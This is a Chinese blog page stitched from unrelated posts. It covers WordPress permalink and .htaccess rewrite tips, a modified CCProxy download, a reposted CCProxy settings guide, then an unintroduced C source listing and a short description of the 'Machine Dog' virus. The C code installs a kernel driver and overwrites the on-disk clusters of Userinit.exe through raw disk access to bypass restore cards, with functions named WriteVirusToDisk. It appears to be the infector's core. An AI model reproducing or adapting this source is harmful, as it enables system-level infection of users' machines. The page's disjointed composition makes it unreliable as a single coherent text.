虽然早就知道页面静态化的好处，但却一直总认为我这么一个小小的blog，用不用都无所谓的，不会有什么明显的差别的。但今天在合租伙伴 Steven 的建议下，还是研究试验了一下，效果远比我想像中要好的多，所以也简单写个东西介绍一下。

首先这要感谢我们租用的国外主机空间，给我们开放了许多的权限，比国内的空间商要强太多了。

方法：（只针对本主机内的wordpress合租伙伴，不保证在其它地方有效！）

1、登录到wordpress后台，“设置”→“永久链接”。

在“自定义结构”中填写永久链接的格式。

其中常用的写法有：

样式：http://www.yourwebsite.com/123.html
写法：/%post_id%.html
样式：http://www.yourwebsite.com/archives/123.html
写法：/archives/%post_id%.html
样式：http://www.yourwebsite.com/2007/09/16/post-name.html
写法：/%year%/%monthnum%/%day%/%postname%.html
样式：http://www.yourwebsite.com/2007/03/post-name.html
写法：/%year%/%monthnum%/%postname%.html
样式：http://www.yourwebsite.com/category/post-name.html
写法： /%category%/%postname%.html
样式：http://www.yourwebsite.com/archives/post-name.html
写法：/archive/%postname%.html
样式：http://www.yourwebsite.com/post-name.html
写法：/%postname%.html

说明：

%year% 日志发布的年，4位数字，如：2004
%monthnum% 日志发布的月份，2位数字，如：05
%day% 日志发布当月的第几天，2位数字，如：28
%hour% 日志发布时间中的“小时”，2位数字，如：15
%minute% 日志发布时间中的“分钟”，2位数字，如：43
%second% 日志发布时间中的“秒”，2位数字，如：33
%postname% 一串处理过的日志标题。如，日志标题为“This Is A Great Post!”，那么%postname%表示为“this-is-a-great-post”
%post_id% 日志的唯一编号
%category% 日志所在的分类
%author% 日志的作者

2、可根据喜好选择上面中的其一，保存修改！这时目录下会自动生成.htaccess文件，内容已写好，无需我们再手动修改添加。

3、设置完的永久链接 要等待一会才能生效。

另：今天在研究静态化的时候，先是碰到了 htaccess的问题，这才明白这个文件的强大作用，可惜自己已经没有心思再去研究其更多的用法，等有需要时再考虑下了。这是我找到的一篇文章中相关的一部分，转贴一下：

PHP转化为HTML静态页面
虽然不能保证把每个动态页面都转化为静态的HTML文件，但如果网站是驻留在Apache服务器上，则只需一个简单的小脚本就可以把大多数动态页面都转换成HTML文件。

1.确定需要转换成后缀为HTML的PHP文件
我们的目标是那些名下包含动态子页较多的网页。以“index.php?action=show&id=”为例，我们需要对 “index.php”之后的动态子页进行转换。 例如，如果网站里有一个名为“Arts and Crafts”的子目录，URL为“index.php?action=show&id=1”，其它子目录和这个URL只在最后的变量上不同，因此我们需要修改当index.php之后跟随变量时服务器对它的打开方式。

2.通知服务器在接受一个HTML页面的调用请求后打开一个PHP文件
我们需要在服务器上index.php所在的目录下放置一个.htaccess文本文件。.htaccess文件是Apache服务器上的一个目录配置设置文件，它提供了针对目录改变配置的方法，即在一特定的文档目录中放置一个包含一个或多个指令的文件(.htaccess文件)，来作用于此目录及其所有子目录。.htaccess的功能包括设置网页密码、设置发生错误时出现的文件、改变主页文件名、禁止读取文件名、重新导向文件、增加MIME类别、禁止列目录下的文件等。

在需要针对目录改变服务器的配置，而对服务器系统没有root权限时，应该使用.htaccess文件。如果服务器管理员不愿意频繁修改配置，则可以允许用户通过.htaccess文件自己修改配置，尤其是ISP在一台机器上提供多个用户站点，而又希望用户可以自己改变配置的情况下，一般会开放部分.htaccess的功能给使用者自行设置。对于Vdeck用户来说，可能需要先创建一个文本文件，然后在管理面板将其更名为.htaccess。现在我们需要在服务器端指定一些变量。比方说，我需要把“?action=show&id=x”这个变量改成“action-x.html”，这样就能消除动态页面无法被搜索引擎检索的问题。

在开始创建服务器变量前，我们需要先在这个新建的.htaccess文件中创建一个Rewrite Engine (URL重写工具)。只需要在文件第一行写上
RewriteEngine On
这就等于告诉服务器我们要改变一些文件的处理方式。接下来的一行就要指定重写规则：
RewriteRule ^action-([0-9]+)\.html$ index.php?action=show&id=$1 [L,NC]
这个指令表明：只要接到URL中包含“action-0.html”到“action-9.html”的任意静态网页的页面调用请求，服务器将以“index.php?变量”地址返回给调用用户。

先别急着编辑下一条改写规则，我们有必要在更改实际的PHP页面之前先进行一下测试。我们可以对上面的”重写规则”进行测试。首先新开一个浏览器窗口，在地址栏中输入“action-1.html”，如果我们看到的页面显示为“index.php?action=show&id=1”就表明改写规则工作正常。

3.让搜索引擎看到我们的静态化页面
现在，我们需要让搜索引擎能够看到我们经过“改头换面”的新的网页地址。那么，是不是需要赶紧把网站再向搜索引擎提交一遍呢? 不用这么费劲，我们只需打开PHP文件编辑一下就行了。不过在此之前，应记得将要修改的每个脚本都做个备份，将其存放在硬盘上。然后需要确定创建更改链接地址的程序的不同地方。最好在前端而不要在后台进行更改。PHP文件将会从.htaccess文件中得到形如 “index.php?action=show&id=x”之类的信息。我们需要把这些动态生成的网页地址更改一下，并以静态化页面地址显示给用户和搜索引擎。即将所有URL中包含“index.php?action=show&id=”的部分替换为“action-”，并加上.html 后缀。

一旦发现待修改的区域，在更改后要随时检查有无错误。如果在脚本中有错误而没有发现，纠正起来是相当棘手的，尤其在对PHP编码不熟悉的情况下。

没办法只好架网再下载一个了，才发现居然已经升级到6.61版了，而且还是绿色版的，兴致勃勃的下载下来，设置好参数，却怎么找不到隐藏的选项了？

原来取消这个功能了！真是晕人！

我不是黑客，但也不喜欢右下键的图标有它在那放着，碍眼！自己干掉它！

原理其实挺简单的，只占用了我不到一个小时的中午时间就搞定了。整个世界清静了！

可惜我的blog空间不能下载文件，否则就传上来了。有需要的联系我吧！

终于换成功可以下载的空间了，提供本地下载：

http://www.a-boss.com/soft/CCProxy6.61_RobaY去图标绿色版.rar

需要说明一点的是：如果设置了自动隐藏功能，你将不能看到程序界面，需要更新ccproxy.ini中的autohide=0保存后即可！

再转一篇关于这个程序的一些功能介绍，个别功能在新版本下已经失效！

CCProxy高级功能介绍- -

代理服务器CCProxy开发了大量针对网络管理员的高级功能，下面的介绍只是关于高级功能的说明和对应的参数设置。 所有参数在修改保存后，都需要重新启动CCProxy。

怎样修改帐号管理所支持的帐号数

默认值是300。对应CCProxy.ini里的MaxUserCount。

怎样修改时间安排的支持数目

默认值是20。对应CCProxy.ini里的MaxTimeSchedule。

怎样修改网站过滤的支持数目

默认值是20。对应CCProxy.ini里的MaxWebFilter。

怎样修改CCProxy的同时在线支持数目

默认值是300。对应CCProxy.ini里的MaxConnection。

怎样拦截进出代理服务器的所有数据

本功能原来是方便用户反馈程序错误用的。在主界面上，按住Ctrl键，双击”0/0″。所有拦截的数据都保存到C:\log.dat。最多保存256K数据。此功能影响代理服务器速度，需即时关闭。对应CCProxy.ini里的BugTrace。

怎样在线检查CCProxy最新版本

此功能不会将您的电脑的任何信息发送给遥志软件，请放心使用。
双击主界面上的U字母。

怎样修改界面的连接数曲线(绿色)的显示高度和流量带宽曲线(黄色)显示高度?

在界面上单击鼠标右键,在弹出的窗口中修改度默认是300和256，如图。

怎样调出Windows任务管理器?

双击主界面上的0/0。

怎样知道所运行的CCProxy的发布时间

双击主界面上的时间数字。

怎样快速进到CCProxy安装目录

按着Ctrl键，双击主界面上的时间数字。

怎样知道今天的农历日期

按着Shift键，双击主界面上的时间数字。

怎样实现启动CCProxy时自动拨号和关闭CCProxy时自动断线

对应CCProxy.ini里的DialWhenStartup和DisconnectWhenShutdown。将值设成1时，表示打开这个功能。在使用此功能前，要设置好代理服务器的拨号选项。

怎样让服务器拨号闲置时自动断网并关机

此功能由黑龙江天衣有缝提出。首先要设置好拨号闲置自动断开功能，然后将CCProxy.ini里的
ShutDownWhenIdle=1。

怎样实现定时关机

CCProxy.ini
[ShutDown]
Enable=1
Time=20:00
表示20:00关机

CCProxy.ini
[ShutDown]
Enable=1
Time=05:05
表示05:05关机

此功能最好在CCProxy NT服务方式下运行，这样CCProxy可以获得更高的权限来关闭电脑

怎样修改网站过滤服务器返回的字符串

CCProxy.ini里的
WebSiteForbidden对应站点过滤服务器返回的字符串。注意，要保留%s。WebContentForbidden对应内容过滤服务器返回的字符串。
如果WebSiteForbidden里填写的是一个文件绝对路径名，那么服务器会读取该文件来作为过滤网站返回信息。如：WebSiteForbidden=c:\alert.htm。
如果WebContentForbidden里填写的是一个文件绝对路径名，那么服务器会读取该文件来作为内容过滤返回信息。如：WebSiteForbidden=c:\alert.htm。

怎样修改网页身份认证里的字符串

CCProxy.ini里的
WebAuthTitle对应认证对话框里的字符串“CCProxy Authorization”。AuthorityFailed对应认证失败后服务器返回的字符串。

怎样实现验证失败时显示指定的htm文件?

CCProxy.ini里的
AuthorityFailed里输入htm文件的绝对地址。例如:AuthorityFailed=f:\1.htm,表示显示F盘根目录下的1.htm文件。

怎样实现帐号排序?

“帐号管理”→ 点击”用户名”、”IP地址”、”MAC地址”、”连接数”任一字段名即可按所选字段名排序，连续点击则分别按”降序”、”升序”分别排列。如图。确定后，将按照排序结果保存帐号。

怎样实现远程拨号?

1) 在服务器上手工建立一个拨号连接，并且测试一下这个拨号连接是否有效。
2) “设置”-> 选择”远程拨号”。
3) “设置”->”高级”->”拨号”：在”拨号列表”中选择 1)中建立的拨号连接。在”拨号用户名”、”拨号密码”里填上正确的上网帐号信息。
4) 在帐号管理中编辑或新增用户，并选择允许该用户”远程拨号”。
5) 客户端的浏览器首先要设置好HTTP代理服务。然后在浏览器中输入 http://ccproxy.connect 就可以拨号了，如果客户端使用 http://ccproxy.connect.电话号码.用户名.密码，则用指定的电话号码和用户帐号信息拨号。
6) 断开拨号网络连接则在浏览器中输入 http://ccproxy.disconnect

怎样实现通过客户端使服务器自动拨号?

1)”设置”-> 选择”远程拨号”。
2)”设置”->”高级”->”拨号”-> 选择”允许自动拨号”，然后在相应代理协议前打勾。
3)”帐号”-> 编辑或新建帐号 -> 选择”远程拨号”。
这样，只要被允许的客户端使用被允许的协议（HTTP/FTP/TELNET等）就可以实现服务器自动拨号功能。

怎样实现隐藏任务栏图标 ?
编辑ccproxy.ini，在 [System] 下增加一行Allhide=1。去掉这一行则显示图标。
或：”设置”->”高级”->”其他”：选择”隐藏所有”。
若要重新显示主界面，只需再运行一次CCProxy即可（CCProxy自动判断，不会在同一个目录下启动多个进程）。

怎样使用热键激活界面?

编辑CCProxy目录下的CCProxy.ini，把EnableHotKey=0改为1，然后保存文件并重启CCProxy软件。以后当软件隐藏后，只要按下”CTRL+ALT+C”，界面会重新显示。详细设置>>

怎样实现管理员密码控制?

“设置”->”高级”->”其他”：选择”密码保护”，然后在相应的密码框中输入密码。这样每次修改设置、增加或编辑帐号、退出程序都必须输入正确密码方可。
若需要每次启动时必须输入密码则再选择”启动时需要密码”。建议一般情况下不选择。

怎样让客户端显示广告条?

这是一个相当有趣的功能，最初由上海复旦大学Hyne提出。
默认状态是关闭。对应CCProxy.ini里的AddMessage。AddMessage=1，表示开放广告条功能。同时在CCProxy运行目录下写一个addmessage.htm文件(小于4096字节)，当然这个文件的编写很要技巧。
提供两个非常经典的例子：ads1.zip(Hyne提供) ads2.zip(testa提供) 欢迎提供更多好的例子。
另外,可以在界面中按住shift双击0/0,在弹出的对话框中选择,如图。

怎样往客户端发送信息?

客户端如果是Win98，要求已经运行了windows目录下的WINPOPUP.EXE。如果是Win2000/NT，则系统已经自带了消息接收功能。选中需要发信息的帐号点击右键，在第一个编辑框里输入接收者的机器名，第二个编辑框里输入要发送的文字，点击确定就可以发送信息到客户端了。如果上面的对话框里输入的是”*”号，可以发送到局域网里的任何一台机器。

怎样实时观测客户端访问内容(网站)以及客户端连接数和流量?

双击主界面绿色网格即可，并且双击左上角的”当前连接信息”左边那个图标，可以切换观察状态。

怎样实现流量统计和计费?

1) 在CCProxy的”设置”—”高级”—”日志”—”运行流量统计”前面打勾，并设定”流量统计间隔时间”(默认为10分钟)，这样系统会在log文件夹中生成一个文件(如data20030613.txt)，并每隔10分钟系统在该文件中写入一次流量统计数据;
2) 点击”流量统计”，即可打开流量统计文件，观察到流量记录(前面的为流进数据,后面的为流出数据);
3) 下载CCReport插件，可以根据统计出的流量，计算出每用户的使用费用。

怎样实现端口映射?

在”设置”页面点击”端口映射”后面的E按钮,进行相应的设置即可：

怎样设置二级代理?

“设置”->”高级”->”二级代理”：选择”启用二级代理”，在代理地址中输入上级代理服务器IP或计算机名称，选择代理协议HTTP/HTTPS/SOCKS，再输入对应的端口。若需要验证密码，则选择”需要验证”，在”用户名”、”密码”框中分别输入指定信息。需要注意的是：
1) 若上级提供了SOCKS5服务，则可以为下级提供包括HTTP/FTP/GOPHER/SOCKS/RTSP/MMS/TELNET等协议在内的几乎任何服务，本程序可以全部自动转换；若上级提供了HTTPS服务，则绝大部分服务也可为下级提供，除了QQ/PP等UDP协议；若上级只提供了HTTP服务，则下级只能使用HTTP/FTP/GOPHER/SOCKS/TELNET等一般协议，RTSP/MMS等协议无法转换。 2) 6.0版支持不同的协议可以设置不同的二级代理或者不使用二级代理，即每一个协议都可以使用不同的上级代理和不同的协议或者部分协议使用上级代理，而部分协议可以不使用上级代理，也可以全部使用同一个上级代理和协议。

怎样同时运行多个ccproxy进程?

编辑ccproxy.ini，修改EnableMultiRun=1即可，但须安装在不同目录，使用不同端口。

怎样访问带域验证的网页?

可以只设置socks代理(如图)来实现访问，CCProxy要开放DNS服务和SOCKS4服务，客户端的DNS里要设置服务器的IP地址。

怎样结合杀毒软件检查所有通过代理发送和接收的邮件病毒?

编辑ccproxy.ini，修改AntiVirusGate=1表示启用邮件杀毒。目前我们测试过的软件有瑞星2003版和Norton 2003版，只要服务器上安装了这样的杀毒软件，就可以实现代理服务器邮件杀毒功能。

如何控制流媒体视频带宽?

编辑ccproxy.ini，修改[MMS]项：EnableRecord=1

如何屏蔽端口和屏蔽IP?

编辑ccproxy.ini，修改[DestDisable]项：
PortDisabled=1表示启用端口屏蔽，Port=25;110;80表示屏蔽这些端口;
IPDisabled=1表示启用IP屏蔽，IP=0.0.0.0-202.0.0.0表示屏蔽这个范围内的IP

用户通过web方式发送邮件时如何禁止发送附件?

在”内容过滤”里加入”;; filename=”。(注意: 在分号后面有一空格，如果有其余过滤的内容如chat等必须放在第一位，如图)

怎样在客户端Ping互联网地址?

1）首先确认CCProxy的Telnet代理已经打开。
2）假设代理服务器地址是192.168.0.1，在客户端上输入命令行 telnet 192.168.0.1，然后回车。
3）在提示符CCProxy Telnet>后，输入你要ping的地址，如ping sina.com.cn ，然后回车。

在远程终端服务(Terminal Services)下运行CCProxy需要注意的事项?

如果在远程终端服务(Terminal Services)下运行CCProxy，而且以NT服务方式运行，需要设置CCProxy.ini里的一个参数：TerminalServices=1。显示CCProxy界面只需要再次运行CCProxy就可以了。

怎样在代理服务器CCProxy里巧妙的利用Auto Proxy功能?

在代理服务器CCProxy里巧妙的利用Auto Proxy功能,请看详细设置

C源代码：客户端怎样通过proxy进行连接，支持https, socks5代理?

客户端通过proxy进行连接，支持https, socks5代理的C源代码请看

如何突破屏蔽代理访问的网站?

有些网站屏蔽代理访问,可以通过编辑CCProxy目录下的CCProxy.ini来突破屏蔽,把EnableProxyConnection=0改为1，然后保存文件并重启CCProxy软件。详细设置>>

如何绑定服务器IP地址?

编辑CCProxy目录下CCProxy.ini文件,把ServerBindIP=0.0.0.0改为服务器接入线路的IP地址,然后保存文件并重启CCP roxy软件。当服务器有多条线路接入时,管理员可以通过此功能合理分配带宽资源。详细设置>>

如何让目标网站无法得知你是从哪个网站进入该网站?

编辑CCProxy目录下CCProxy.ini文件,把EnableReferer=0改为1,然后保存文件并重启CCProxy软件。此功能便于保密,让目标网站无法得知你是从哪个网站进入该网站的。详细设置>>

如何关闭gzip,加强广告条功能的应用范围？

编辑CCProxy目录下CCProxy.ini文件,把EnableGzip的值改为0,然后保存文件并重启CCProxy软件,此功能可以大大加强广告条功能的应用范围。详细设置>>

// Test.cpp : 定义控制台应用程序的入口点。
//
#include “stdafx.h”

//===========================================================
#include <pshpack1.h>
typedef struct _PARTITION_ENTRY
{
UCHAR active; // 能否启动标志
UCHAR StartHead; // 该分区起始磁头号
UCHAR StartSector; // 起始柱面号高2位：6位起始扇区号
UCHAR StartCylinder; // 起始柱面号低8位
UCHAR PartitionType; // 分区类型
UCHAR EndHead; // 该分区终止磁头号
UCHAR EndSector; // 终止柱面号高2位：6位终止扇区号
UCHAR EndCylinder; // 终止柱面号低8位
ULONG StartLBA; // 起始扇区号
ULONG TotalSector; // 分区尺寸（总扇区数）
} PARTITION_ENTRY, *PPARTITION_ENTRY;

//============================================================
typedef struct _MBR_SECTOR
{
UCHAR BootCode[446];
PARTITION_ENTRY Partition[4];
USHORT Signature;
} MBR_SECTOR, *PMBR_SECTOR;

//==========================================================
typedef struct _BBR_SECTOR
{
USHORT JmpCode; // 2字节跳转指令,跳转到引导代码
UCHAR NopCode; // 1字节nop指令,填充用,保证跳转指令长3个字节
UCHAR OEMName[8]; // 8字节的OEMName

// 下面开始为: BPB( BIOS Parameter Block )

USHORT BytesPerSector; // 每个扇区的字节数 (512 1024 2048 4096)
UCHAR SectorsPerCluster; // 每个簇的扇区数 ( 1 2 4 8 16 32 64 128 )两者相乘不能超过32K(簇最大大小)
USHORT ReservedSectors; // 从卷的第一个扇区开始的保留扇区数目,该值不能为0，对于FAT12/FAT16，该值通常为1,对于FAT32，典型值为32
UCHAR NumberOfFATs; // 卷上FAT数据结构的数目，该值通常应为2,[NTFS不使用NumberOfFATs字段，必须为0]
USHORT RootEntries; // 对于FAT12/FAT16,该值表示32字节目录项的数目,对于FAT32，该值必须为0；[NTFS不使用]
USHORT NumberOfSectors16; // 该卷上的扇区总数，该字段可以为0，如果该字段为0，则NumberOfSectors32不能为0；对于FAT32，该字段必须为0 [FAT32/NTFS不使用该字段]
UCHAR MediaDescriptor; // 介质类型
USHORT SectorsPerFAT16; // 该字段标识一个FAT结构占有的扇区数（FAT12/FAT16）,对于FAT32卷，该字段必须为0；[FAT32/NTFS不使用该字段]
USHORT SectorsPerTrack; // 用于INT 0×13中断的每个磁道的扇区数
USHORT HeadsPerCylinder; // 用于INT 0×13中断的每个柱面的磁头数
ULONG HiddenSectors; // 包含该FAT卷的分区之前的隐藏扇区数
ULONG NumberOfSectors32; // 该字段包含该卷上的所有扇区数目，对于FAT32，该字段不为0；FAT12/FAT16可根据实际大小是否超过65536个扇区数决定是否采用该字段； [NTFS不使用该字段]

// 下面开始为: EBPB ( Extended BIOS Parameter Block )

ULONG SectorsPerFAT32; // 对于FAT32，该字段包含一个FAT的大小，而SectorsPerFAT16字段必须为0;
} BBR_SECTOR, *PBBR_SECTOR;

#include <poppack.h>

#define PARTITION_TYPE_NTFS 0×07
#define PARTITION_TYPE_FAT32 0x0B
#define PARTITION_TYPE_FAT32_LBA 0x0C

//==========================================================
#define STR_SYSFILE_PATH TEXT(“%SystemRoot%\\system32\\drivers\\pcihdd.sys”)
#define STR_VIRFILE_PATH TEXT(“%SystemRoot%\\System32\\Userinit.exe”)
#define STR_DSKDEVICE_NAME TEXT(“\\\\.\\PhysicalDrive0″)
#define STR_HDDDEVICE_NAME TEXT(“\\\\.\\PhysicalHardDisk0″)

//=========================================================
#define IOCTL_MYDEV_BASE 0xF000
#define IOCTL_MYDEV_Fun_0xF01 CTL_CODE(IOCTL_MYDEV_BASE, 0xF01, METHOD_BUFFERED, FILE_ANY_ACCESS)

//============================================================
DWORD InstallAndStartDriver(HMODULE ModuleHandle)
{
TCHAR filePath[MAX_PATH];
HANDLE fileHandle;
HRSRC hSysRes;
DWORD dwWritten;
DWORD dwSysLen;
PVOID lpSysBuf;
SC_HANDLE hSCManager;
SC_HANDLE hService;
SERVICE_STATUS sService;
DWORD errCode = ERROR_SUCCESS;
if(
(NULL == (hSysRes = FindResource(ModuleHandle, (LPCTSTR)1001, (LPCTSTR)1001)))
||
(0 == (dwSysLen = SizeofResource(ModuleHandle, hSysRes)))
||
(NULL == (lpSysBuf = LockResource(hSysRes)))
||
(0 == ExpandEnvironmentStrings(STR_SYSFILE_PATH, &filePath[0], sizeof(filePath)))
||
(INVALID_HANDLE_VALUE == (fileHandle = CreateFile(filePath, GENERIC_WRITE, 0, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL)))
)
{
errCode = GetLastError();
goto FunExit00;
}
if(
!WriteFile(fileHandle, lpSysBuf, dwSysLen, &dwWritten, NULL)
||
!SetEndOfFile(fileHandle)
||
!FlushFileBuffers(fileHandle)
)
{
errCode = GetLastError();
}
CloseHandle(fileHandle);
if(ERROR_SUCCESS != errCode)
{
goto FunExit01;
}
if(NULL == (hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS)))
{
errCode = GetLastError();
goto FunExit01;
}
hService = CreateService(
hSCManager,
TEXT(“PciHdd”),
TEXT(“PciHdd”),
SERVICE_ALL_ACCESS,
SERVICE_KERNEL_DRIVER,
SERVICE_DEMAND_START,
SERVICE_ERROR_IGNORE,
filePath,
NULL,
NULL,
NULL,
NULL,
NULL
);
if(NULL != hService)
{
CloseServiceHandle(hService);
}
else
{
if(NULL != (hService = OpenService(hSCManager, TEXT(“PciHdd”), SERVICE_ALL_ACCESS)))
{
ControlService(hService, SERVICE_CONTROL_STOP, &sService);
DeleteService(hService);
CloseServiceHandle(hService);
}
hService = CreateService(
hSCManager,
TEXT(“PciHdd”),
TEXT(“PciHdd”),
SERVICE_ALL_ACCESS,
SERVICE_KERNEL_DRIVER,
SERVICE_DEMAND_START,
SERVICE_ERROR_IGNORE,
filePath,
NULL,
NULL,
NULL,
NULL,
NULL
);
if(NULL != hService)
{
CloseServiceHandle(hService);
}
else
{
errCode = GetLastError();
goto FunExit02;
}
}
if(NULL == (hService = OpenService(hSCManager, TEXT(“PciHdd”), SERVICE_START)))
{
errCode = GetLastError();
goto FunExit02;
}
StartService(hService, 0, NULL);
CloseServiceHandle(hService);
FunExit02:
CloseServiceHandle(hSCManager);
FunExit01:
DeleteFile(filePath);
FunExit00:
return err
Code;
}

//========================================================
DWORD StopAndDeleteDriver(VOID)
{
TCHAR filePath[MAX_PATH];
SC_HANDLE hSCManager;
SC_HANDLE hService;
SERVICE_STATUS sService;
DWORD errCode = ERROR_SUCCESS;
if(NULL == (hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS)))
{
errCode = GetLastError();
goto FunExit00;
}
if(NULL == (hService = OpenService(hSCManager, TEXT(“PciHdd”), SERVICE_ALL_ACCESS)))
{
errCode = GetLastError();
goto FunExit01;
}
ControlService(hService, SERVICE_CONTROL_STOP, &sService);
DeleteService(hService);
CloseServiceHandle(hService);
FunExit01:
CloseServiceHandle(hSCManager);
FunExit00:
ExpandEnvironmentStrings(STR_SYSFILE_PATH, &filePath[0], sizeof(filePath));
DeleteFile(filePath);
return errCode;
}

//========================================================
// 感染硬盘第一个分区的指定的文件
//
// 1)通过FSCTL_GET_RETRIEVAL_POINTERS获取文件数据的分布 信息
//
// 2)通过直接访问硬盘(\\\\.\\PhysicalHardDisk0)的的MDR和第一个分区的引导扇区得到分区参数来定位文件。
//
// 3)通过对比ReadFile读取的文件数据和自己定位后直接 读取所得到的文件数据，确定定位是否正确
//
// 入口参数:
// 要感染的文件名（完整路径）
//
// Return value:
// Success -> NULL
// Failed -> 指向出错信息的指针
//==========================================================
DWORD WriteVirusToDisk(LPCTSTR VirusFile)
{
STARTING_VCN_INPUT_BUFFER iVcnBuf;
UCHAR oVcnBuf[272];
PRETRIEVAL_POINTERS_BUFFER lpVcnBuf;
DWORD dwVcnExtents;
LARGE_INTEGER startLcn;
PUCHAR lpClusterBuf;
DWORD dwClusterLen;
UCHAR dataBuf[512];
UCHAR diskBuf[512];
DWORD dataLen;
LARGE_INTEGER diskPos;
PPARTITION_ENTRY lpPartition;
ULONG dwPartitionStart;
ULONG dwPartitionType;
PBBR_SECTOR lpBootSector;
DWORD SectorsPerCluster;
HANDLE hHddDevice;
HANDLE hDskDevice;
HANDLE hVirusFile;
DWORD errCode = ERROR_SUCCESS;
if(INVALID_HANDLE_VALUE == (hHddDevice = CreateFileA(STR_HDDDEVICE_NAME, GENERIC_READ, 0, NULL, OPEN_EXISTING, 0, NULL)))
{
errCode = GetLastError();
goto FunExit00;
}
//
if(INVALID_HANDLE_VALUE == (hVirusFile = CreateFileA(VirusFile, GENERIC_READ, FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_FLAG_NO_BUFFERING, NULL)))
{
errCode = GetLastError();
goto FunExit01;
}
iVcnBuf.StartingVcn.QuadPart = 0;
RtlZeroMemory(oVcnBuf, sizeof(oVcnBuf));
if(!DeviceIoControl(hVirusFile, FSCTL_GET_RETRIEVAL_POINTERS, &iVcnBuf, sizeof(iVcnBuf), &oVcnBuf[0], sizeof(oVcnBuf), &dataLen, NULL))
{
errCode = GetLastError();
goto FunExit02;
}
lpVcnBuf = (PRETRIEVAL_POINTERS_BUFFER)&oVcnBuf[0];
dwVcnExtents = lpVcnBuf->ExtentCount;
startLcn = lpVcnBuf->Extents[0].Lcn;
if(!dwVcnExtents)
{
errCode = (ULONG)(-3); // 文件太小, 不能操作
goto FunExit02;
}
if(startLcn.QuadPart == -1)
{
errCode = (ULONG)(-4); // 该文件是压缩文件, 不能操作
goto FunExit02;
}
ReadFile(hVirusFile, dataBuf, sizeof(dataBuf), &dataLen, NULL);
// 打开第一个物理硬盘
if(INVALID_HANDLE_VALUE == (hDskDevice = CreateFileA(STR_DSKDEVICE_NAME, GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL)))
{
errCode = GetLastError();
goto FunExit02;
}
// 读取硬盘第一个扇区(MBR)
SetFilePointer(hDskDevice, 0, NULL, FILE_BEGIN);
ReadFile(hDskDevice, diskBuf, sizeof(diskBuf), &dataLen, NULL);
lpPartition = &(((PMBR_SECTOR)&diskBuf[0])->Partition[0]);
if(lpPartition[0].active != 0×80)
{
errCode = (ULONG)(-1); // 分区不是启动分区
goto FunExit03;
}
dwPartitionType = lpPartition[0].PartitionType;
if(
dwPartitionType != PARTITION_TYPE_FAT32
&&
dwPartitionType != PARTITION_TYPE_FAT32_LBA
&&
dwPartitionType != PARTITION_TYPE_NTFS
)
{
errCode = (ULONG)(-2); // 不支持的磁盘分区
goto FunExit03;
}
dwPartitionStart = lpPartition[0].StartLBA;
diskPos.QuadPart = dwPartitionStart * 512;
// 读取启动分区的第一个扇区(启动扇区)
SetFilePointer(hDskDevice, diskPos.LowPart, &diskPos.HighPart, FILE_BEGIN);
ReadFile(hDskDevice, diskBuf, sizeof(diskBuf), &dataLen, NULL);
lpBootSector = (PBBR_SECTOR)&diskBuf[0];
SectorsPerCluster = lpBootSector->SectorsPerCluster;
// 根据FAT32/NTFS计算Userinit的起始簇的偏移量
diskPos.QuadPart = dwPartitionStart;
diskPos.QuadPart+= lpBootSector->ReservedSectors;
if(dwPartitionType == PARTITION_TYPE_FAT32 || dwPartitionType == PARTITION_TYPE_FAT32_LBA)
{
diskPos.QuadPart+= lpBootSector->NumberOfFATs * lpBootSector->SectorsPerFAT32;
}
diskPos.QuadPart+= startLcn.QuadPart * SectorsPerCluster;
diskPos.QuadPart*= 512;
// 检查文件寻址
SetFilePointer(hDskDevice, diskPos.LowPart, &diskPos.HighPart, FILE_BEGIN);
ReadFile(hDskDevice, diskBuf, sizeof(diskBuf), &dataLen, NULL);
if(!RtlEqualMemory(dataBuf, diskBuf, sizeof(diskBuf)))
{
errCode = (ULONG)(-5); // 寻址文件不成功
goto FunExit03;
}
// 分配缓冲
dwClusterLen = SectorsPerCluster*512;
lpClusterBuf = (PUCHAR)GlobalAlloc(GMEM_ZEROINIT, dwClusterLen); // 保存一个簇所要的缓冲
if(!lpClusterBuf)
{
errCode = GetLastError(); // 寻址文件不成功
goto FunExit03;
}
// 把Virus文件的数据从SYS文件资源段中解码出来
if(!DeviceIoControl(
hVirusFile,
IOCTL_MYDEV_Fun_0xF01,
(PVOID)0×00401000, // 本执行文件代码段的开始, 在C语言中我不会表达
0x73E, // 本执行文件代码段的长度, 在C语言中我不会表达
lpClusterBuf,
dwClusterLen,
&dataLen,
NULL
))
{
errCode = GetLastError();
goto FunExit04;
}
// 写Virus文件的数据到磁盘
SetFilePointer(hDskDevice, diskPos.LowPart, &diskPos.HighPart, FILE_BEGIN);
WriteFile(hDskDevice, lpClusterBuf, dwClusterLen, &dataLen, NULL);
FlushFileBuffers(hDskDevice);
errCode = ERROR_SUCCESS;
FunExit04:
GlobalFree(lpClusterBuf);
FunExit03:
CloseHandle(hDskDevice);
FunExit02:
CloseHandle(hVirusFile);
FunExit01:
CloseHandle(hHddDevice);
FunExit00:
return errCode;
}

//==========================================================
int _tmain(int argc, _TCHAR* argv[])
{
TCHAR filePath[MAX_PATH];
DWORD errCode;
if(ERROR_SUCCESS != (errCode = InstallAndStartDriver(GetM
oduleHandleA(NULL))))
{
MessageBox(NULL, TEXT(“驱动程序的加载没有成功,程序将无法运行”), NULL, MB_ICONERROR);
goto FunExit00;
}
ExpandEnvironmentStrings(STR_VIRFILE_PATH, &filePath[0], sizeof(filePath));
WriteVirusToDisk(filePath);
StopAndDeleteDriver();
FunExit00:
return 0;
}

机器狗的生前身后
曾经有很多人说有穿透还原卡、冰点的病毒，但是在各个论坛都没有样本证据，直到2007年8月29日终于有人贴出了一个样本。这个病毒没有名字，图标是SONY的机器狗阿宝，就像前辈熊猫烧香一样，大家给它起了个名字叫机器狗。

工作原理
机器狗本身会释放出一个pcihdd.sys到drivers目录，pcihdd.sys是一个底层硬盘驱动，提高自己的优先级接替还原卡或冰点的硬盘驱动，然后访问指定的网址，这些网址只要连接就会自动下载大量的病毒与恶意插件。然后修改接管启动管理器，最可怕的是，会通过内部网络传播，一台中招，能引发整个网络的电脑全部自动重启。

